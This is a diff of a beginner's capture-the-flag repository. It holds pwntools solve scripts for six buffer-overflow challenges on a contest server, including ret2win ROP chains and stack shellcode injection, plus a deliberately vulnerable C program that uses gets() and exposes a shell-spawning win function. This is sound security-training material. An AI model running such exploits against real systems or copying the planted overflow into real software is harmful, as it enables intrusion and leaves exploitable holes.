First CTFs

BOF/.gdb_history

@@ -0,0 +1,2 @@
+run
+quit

BOF/01_guestbook/.gdb_history

@@ -0,0 +1 @@
+quit

BOF/01_guestbook/solve.py

@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+# context.binary = elf = ELF('guestbook',checksec=False)
+OFFSET_TO_RIP = 72
+ret = 0x40101A  # ROPGadget ret
+win = 0x40121B  # win address (nm)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13599)
+p.recvuntil(b"name?\n")
+
+payload = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(ret),
+    p64(win),
+)
+p.send(payload)
+p.interactive()

BOF/02_whispered_secrets/.gdb_history

@@ -0,0 +1,2 @@
+r
+quit

BOF/02_whispered_secrets/solve.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("whispered_secrets", checksec=False)
+context.arch = "amd64"
+context.os = "linux"
+
+OFFSET_TO_RIP = 136
+
+p = remote("offsec.m0lecon.it", 13528)
+
+leak_line = p.recvline_contains(b"secret:")
+buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16)
+log.info(f"buf = {buf_addr:#x}")
+# NX disabled
+shellcode = asm(shellcraft.sh())
+
+payload = flat(shellcode, b"A" * (OFFSET_TO_RIP - len(shellcode)), p64(buf_addr))
+p.sendafter(b"secret:\n", payload)
+p.interactive()

BOF/03_tiny_escape_room/.gdb_history

@@ -0,0 +1,4 @@
+disass vuln
+run
+run
+quit

BOF/03_tiny_escape_room/Makefile

@@ -0,0 +1,10 @@
+CC = gcc
+CFLAGS = -fno-stack-protector -no-pie -O0 -g
+
+all: escape_room
+
+escape_room: main.c
+	$(CC) $(CFLAGS) -o $@ $<
+
+clean:
+	rm -f escape_room

BOF/03_tiny_escape_room/main.c

@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win(int arg1, int arg2) {
+    if (arg1 == 0xdeadbeef && arg2 == 0xcafebabe) {
+        puts("Door unlocked!");
+        system("/bin/sh");
+    } else {
+        printf("Wrong keys: 0x%x, 0x%x\n", arg1, arg2);
+    }
+}
+
+void gadgets() {
+    __asm__("pop %rdi; ret");
+    __asm__("pop %rsi; ret");
+}
+
+void vuln() {
+    char buffer[64];
+    puts("Welcome to the tiny escape room!");
+    puts("Two magic keys open the door.");
+    puts("keys?");
+    gets(buffer);
+}
+
+int main() {
+    setup();
+    vuln();
+    return 0;
+}

BOF/03_tiny_escape_room/solve.py

@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./escape_room", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13566)
+# p.recvuntil(b"keys?\n")
+# Your exploit here
+
+var1 = 0xDEADBEEF
+var2 = 0xCAFEBABE
+OFFSET = 72
+# Gadget to overwrite rdi e rsi (pop)
+# (Creati in main.c)
+rdi = 0x401287
+rsi = 0x401289
+ret = 0x40101A
+# win addr
+win = 0x40121B
+payload = flat(
+    b"A" * OFFSET,
+    p64(rsi),
+    p64(var2),
+    p64(rdi),
+    p64(var1),
+    p64(ret),
+    p64(win),
+)
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()

BOF/04_lemonade_stand/.gdb_history

@@ -0,0 +1,53 @@
+disass vuln
+b *0x00000000000012a7
+run
+n
+n
+n
+n
+n
+n
+c
+v
+c
+quit
+run
+disass main
+b *+23
+disass main
+breaj +23
+break +23
+info breakpoint
+info breakpoints
+clear breakpoints
+layout asm
+b <main+23>
+b main
+c
+r
+b +23
+b main+23
+b *(main+23)
+c
+ni
+ni
+c
+quit
+disass main
+quit
+disass main
+disass vuln
+b *0x00000000000012a2
+r
+b +5
+quit
+disass vuln
+b *0x00000000000012a2
+r
+quit
+quit
+run
+quit
+r
+disass vuln
+quit

BOF/04_lemonade_stand/solve.py

@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./lemonade_stand", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13562)
+# Your exploit here
+# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value
+OFFSET = 76
+leet = 0x1337
+payload = flat(b"A" * OFFSET, p64(leet))
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()

BOF/05_mini_game_arena/.gdb_history

@@ -0,0 +1,3 @@
+r
+:q
+quit

BOF/05_mini_game_arena/solve.py

@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF('./mini_game', checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13509)
+# Your exploit here
+OFFSET = 72
+win = 0x4011fb
+payload = flat(
+    b'A'*OFFSET,
+    win,
+)
+p.send(payload)
+#p.send(b'cat flag\n')
+#p.recv()
+p.interactive()

BOF/06_cosmic_burger_joint/.gdb_history

@@ -0,0 +1,4 @@
+run
+quit
+disass vuln
+quit

BOF/06_cosmic_burger_joint/solve.py

@@ -0,0 +1,23 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./cosmic_burger", checksec=False)
+
+p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13529)
+# Your exploit here
+OFFSET = 40
+#   mov    eax,DWORD PTR [rbp-0x4]
+#   cmp    eax,0xbeef
+#   jne    0x12f2 <vuln+196>
+#   mov    eax,DWORD PTR [rbp-0x8]
+#   cmp    eax,0xf00d
+first = 0xBEEF
+second = 0xF00D
+payload = flat(
+    b"A" * OFFSET,
+    p32(second),
+    p32(first),
+)
+p.send(payload)
+p.interactive()